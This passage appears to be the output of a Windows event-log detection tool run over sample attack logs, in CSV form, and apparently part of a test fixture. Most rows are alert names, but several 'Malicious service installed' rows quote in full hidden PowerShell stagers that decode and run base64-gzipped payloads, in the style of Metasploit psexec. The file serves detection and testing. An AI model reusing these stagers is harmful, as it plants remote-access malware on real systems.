8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:07:21.937 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:11:15.832 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
